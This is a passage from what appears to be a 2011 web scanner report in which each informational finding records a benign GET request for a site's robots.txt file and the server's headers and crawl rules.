#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

29.95. http://www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fashioncocktail.com
Path:   /|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fashioncocktail.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web028
X-Webserver: oak-tp-web028
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Sun, 30 Jan 2011 01:53:02 GMT
X-Varnish: 2957496589
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Disallow: /
Allow: /.m/

User-agent: Y!J-SRD
Disallow: /
All
...[SNIP]...

29.96. http://www.ftc.gov/ogc/coppa1.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftc.gov
Path:   /ogc/coppa1.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftc.gov

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:14 GMT
Server: Apache
Last-Modified: Wed, 18 Jul 2007 16:06:19 GMT
ETag: "945158-40-4358bdfd754c0"
Accept-Ranges: bytes
Content-Length: 64
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# robots.txt for http://www.ftc.gov/
#
User-agent: *
Disallow:

29.97. http://www.googleadservices.com/pagead/conversion.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Sun, 30 Jan 2011 01:53:36 GMT
Expires: Sun, 30 Jan 2011 01:53:36 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.98. http://www.habitablezone.com/space/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.habitablezone.com
Path:   /space/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.habitablezone.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:06:10 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sun, 25 Oct 2009 03:29:46 GMT
ETag: "187e9-8e1-476ba0e7e5e80"
Accept-Ranges: bytes
Content-Length: 2273
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# for an installation in a subdirectory, you have to copy this file in your root of your domain and add /subdir/ on each line
User-agent: *
Crawl-Delay: 30
Disallow: /CVS/
Disallow: /lib/
Disallow: /
...[SNIP]...

29.99. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoovers.com
Path:   /business-information/--pageid__13823--/global-mktg-index.xhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hoovers.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:37 GMT
Server: Apache
Last-Modified: Wed, 14 Jul 2010 18:11:37 GMT
ETag: "488"
Accept-Ranges: bytes
Content-Length: 1160
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: HID=173.193.214.243.1296352417437192; path=/; expires=Fri, 29-Jan-16 01:53:37 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerhaspriv-colo1=217829898.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/

# robots.txt for Hoover's Online http://www.hoovers.com/
# For information about Hoover's Online please contact
# webadmin@hoovers.com
#

User-agent: *
Disallow: /cgi-bin/ # Need to provide paramete
...[SNIP]...

29.100. http://www.interactivedata-rts.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interactivedata-rts.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interactivedata-rts.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 02 Jul 2009 15:27:11 GMT
ETag: "1586a1-1a-46dbaac6cd1c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

#User-agent: *
#Disallow:

29.101. http://www.live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.live.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.live.com

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=345600
Content-Type: text/plain; charset=utf-8
Expires: Wed, 02 Feb 2011 23:13:40 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xid=4967caa6-1a3f-4f7c-840f-7c231b9ef9bf&&BL2xxxxxxC502&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=821848180&U=&E=&P=&B=; domain=.live.com; path=/
Set-Cookie: mkt1=norm=; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.www.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:40 GMT; path=/
Set-Cookie: E=P:URLzTCGOzYg=:6a/86DyJHtrjSXfYrSFgu4EfzbnMP5TrcqQBnh3onTQ=:F; domain=.live.com; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:13:39 GMT
Connection: close
Content-Length: 23

User-agent: *
Disallow:

29.102. http://www.livescience.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livescience.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livescience.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:45 GMT
Server: Apache
Last-Modified: Fri, 24 Dec 2010 16:04:05 GMT
ETag: "39d045b-275-4982a22b24740"
Accept-Ranges: bytes
Content-Length: 629
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /js/
Disallow: /aol/
Disallow: /newsub/
Disallow: /flash/
Disallow: /promo/
Disallow: /template_images/
Disallow: /upload/
Disallow: /php/ads/
Disallow: /php/common/
Disallow:
...[SNIP]...

29.103. http://www.morningstar.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.morningstar.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.morningstar.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Pragma: no-cache
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Content-Length: 72
Content-Type: text/plain;charset=utf-8
GstreamInfo: S=app102 D=32349 t=1296357234774166
Vary: Accept-Encoding,User-Agent
X-OSO-Fetch-Time: 0
X-OSO-Total-Time: 0.01
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 01:54:04 GMT
Connection: close

# OSO Robots.txt
# Last Updated Oct 12 2010

User-Agent: *
Disallow:

29.104. http://www.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:07:04 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.105. http://www.nasaspaceflight.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nasaspaceflight.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nasaspaceflight.com

Response

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.7
Vary: Cookie
Set-Cookie: pixelstats_visitor_id=aee3a15e102dbdd3b62d2eea1e5c1cb6; expires=Tue, 01-Mar-2011 03:12:26 GMT
X-Pingback: http://www.nasaspaceflight.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8
Content-Length: 24
Date: Sun, 30 Jan 2011 03:12:26 GMT
Server: lighttpd/1.4.19

User-agent: *
Disallow:

29.106. https://www.newsvine.com/_nv/api/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/api/accounts/login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=aa91a51466599cd3eddf02f9186836c3; expires=Sat, 25-Jan-2031 01:23:07 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 01:23:07 GMT
Content-Length: 227
Keep-Alive: timeout=3, max=984
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://www.ne
...[SNIP]...

29.107. http://www.outofthecradle.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outofthecradle.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outofthecradle.net

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:15:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.outofthecradle.net/WordPress/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

User-agent: *
Disallow:

29.108. http://www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcmag.com
Path:   /category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcmag.com

Response

HTTP/1.0 200 OK
Content-Length: 438
Content-Type: text/plain
Last-Modified: Tue, 30 Nov 2010 20:01:03 GMT
Accept-Ranges: bytes
ETag: "6f123051c990cb1:46c"
Server: Microsoft-IIS/6.0
X-Powered-By: p3
Expires: Sun, 30 Jan 2011 02:01:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 02:01:05 GMT
Connection: close

User-agent: *
Disallow: /products
Disallow: /products/
Disallow: /search_redirect
Disallow: /search_redirect/
Disallow: /search_results
Disallow: /search_results/
Disallow: /search
Disallow: /
...[SNIP]...

29.109. http://www.polls.newsvine.com/_vine/js/pierre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_vine/js/pierre

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.polls.newsvine.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 227
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 01:28:01 GMT
Date: Sun, 30 Jan 2011 01:23:01 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://www.ne
...[SNIP]...

29.110. http://www.popsci.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popsci.com

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:23 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 16:20:18 GMT
Accept-Ranges: bytes
Content-Length: 1980
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 03:18:23 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=1443
Connection: close
Content-Type: text/plain
Content-Language: en

# $Id: robots.txt,v 1.2 2008-10-13 19:21:48 ilatorre Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

29.111. http://www.popularmechanics.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popularmechanics.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popularmechanics.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 682
Content-Type: text/plain
Cache-Control: max-age=560
Date: Sun, 30 Jan 2011 03:18:24 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...

29.112. http://www.reuters.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:18 GMT
Server: Apache
Expires: Sun, 30 Jan 2011 01:59:15 GMT
Content-Length: 197
Age: 242
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Set-Cookie: SSLBI=A;path=/;domain=www.reuters.com;
RTSS: 1
Connection: close

User-agent: *
Disallow: /finance/stocks/option
Disallow: /finance/stocks/financialHighlights
Disallow: /search
SITEMAP: http://www.reuters.com/sitemap_news_index.xml

User-agent: Pipl
Disallow: /


29.113. http://www.scidev.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scidev.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scidev.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 Nov 2009 17:26:44 GMT
Accept-Ranges: bytes
ETag: "eefc55253d5eca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:18:43 GMT
Connection: close
Content-Length: 55

User-agent: *
Disallow: /uploads/*
Disallow: /admin/*

29.114. http://www.scienceblog.com/cms/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scienceblog.com
Path:   /cms/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scienceblog.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:18:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 02 May 2010 02:29:31 GMT
ETag: "7f-485933f07b8c0"
Accept-Ranges: bytes
Content-Length: 127
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sun, 30 Jan 2011 04:18:58 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

# robots.txt generated at http://www.mcanerin.com
User-agent: *
Crawl-delay: 10
Disallow: /cgi-bin/
Disallow: /boost_stats.php

29.115. http://www.scientificamerican.com/blog/observations/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scientificamerican.com
Path:   /blog/observations/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scientificamerican.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 10 Nov 2010 01:05:11 GMT
ETag: "89c91d-882-494a872f63fc0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 2178
Date: Sun, 30 Jan 2011 03:19:03 GMT
X-Varnish: 1915411453 1915403387
Age: 353
Via: 1.1 varnish
Connection: close

User-Agent: *
Disallow: /pressroom/view/
Disallow: /earth3/
Disallow: /adops/
Disallow: /reviews/
Disallow: /recommendations/
Disallow: /cds
Disallow: /ad-sections/
Disallow: /books/
Disallow
...[SNIP]...

29.116. http://www.scout.com/webproxy.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /webproxy.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://www.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:ef7"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:25:49 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.117. http://www.signonsandiego.com/news/blogs/science-quest/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.signonsandiego.com
Path:   /news/blogs/science-quest/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.signonsandiego.com

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 03:19:00 GMT
ETag: "5e0bd1c281a62a380d7a948085bfe2d1"
Cache-Control: max-age=60
Last-Modified: Sun, 30 Jan 2011 03:18:00 GMT
Content-Type: text/plain
Server: Apache/2.2.10
Content-Length: 23
Date: Sun, 30 Jan 2011 03:19:09 GMT
X-Varnish: 554926183 554925798
Age: 21
Via: 1.1 varnish
Connection: close

User-agent: *
Allow: /

29.118. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.six-telekurs.com
Path:   /tkfich_index/tkfich_home.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.six-telekurs.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8
Content-Type: text/plain
Last-Modified: Fri, 18 Nov 2005 06:42:11 GMT
ETag: "d9933412-01010000"
Content-Length: 238
Connection: close

# http://www.telekurs.com/robots.txt
# http://www.telekurs-financial.com/robots.txt
# http://www.telekurs-multipay.com/robots.txt
# http://www.telekurs-services.com/robots.txt
# http://www.sic.ch/
...[SNIP]...

29.119. http://www.spacedaily.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spacedaily.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spacedaily.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 06:32:42 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Sun, 15 Jun 2008 12:03:11 GMT
ETag: "10440ba-56-4b7bfdc0"
Accept-Ranges: bytes
Content-Length: 86
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /index.html
Allow: /reports
Allow: /pageone
Allow: /
Allow: /news

29.120. http://www.spacepolitics.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spacepolitics.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spacepolitics.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:11 GMT
Server: Apache
X-Pingback: http://www.spacepolitics.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

29.121. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stylemepretty.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:27 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 29 Sep 2009 16:28:42 GMT
ETag: "2a30640-1d0-474b9e84d6280"
Accept-Ranges: bytes
Content-Length: 464
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /comme
...[SNIP]...

29.122. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.terra.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:33 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296353013.296465; path=/; expires=Fri, 01-Jan-2016 00:02:31 GMT; domain=.terra.com
Last-Modified: Thu, 09 Sep 2010 12:20:27 GMT
ETag: "74313e-2f6-48fd2a7be18c0"
Accept-Ranges: bytes
Content-Length: 758
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
User-agent: *
Disallow: /agenda-en/
Disallow: /actualidad/
Disallow: /arte/
Disallow: /ciencia/
Disallow: /content/
Disallow: /cgi-bin/
Disallow: /internet/
Disallo
...[SNIP]...

29.123. http://www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com.mx
Path:   /default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.terra.com.mx

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 301
Content-Type: text/plain
Last-Modified: Thu, 28 Feb 2008 22:00:23 GMT
Accept-Ranges: bytes
ETag: "80b5251557ac81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:03:40 GMT
Connection: close
Set-Cookie: CookiePortalMX=149968080.20480.0000; expires=Sun, 30-Jan-2011 04:03:41 GMT; path=/

Sitemap: http://www.terra.com.mx/sitemap.xml
Sitemap: http://www.terra.com.mx/sitemap_news.xml
User-agent: *
Disallow: /bin/
Disallow: *.cfm
Disallow: *.conf
Disallow: *.doc
Disallow: *.inc
Di
...[SNIP]...

29.124. http://www.theshophound.typepad.com/|http:/www.chicgalleria.com|http:/lastylistmom.com|http:/www.chicgirlstyle.com|http:/blog.sofiawean.com|http:/www.themakeupblogger.com|http:/www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theshophound.typepad.com
Path:   /|http:/www.chicgalleria.com|http:/lastylistmom.com|http:/www.chicgirlstyle.com|http:/blog.sofiawean.com|http:/www.themakeupblogger.com|http:/www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theshophound.typepad.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web006
X-Webserver: oak-tp-web006
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Sun, 30 Jan 2011 02:03:44 GMT
X-Varnish: 2958161737 2941127374
Age: 16549
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Disallow: /
Allow: /.m/

User-agent: Y!J-SRD
Disallow: /
All
...[SNIP]...

29.125. http://www.ticketcity.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketcity.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketcity.com

Response

HTTP/1.1 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Thu, 22 Jul 2010 14:19:57 GMT
Accept-Ranges: bytes
ETag: "f5bda4f6a829cb1:1713"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
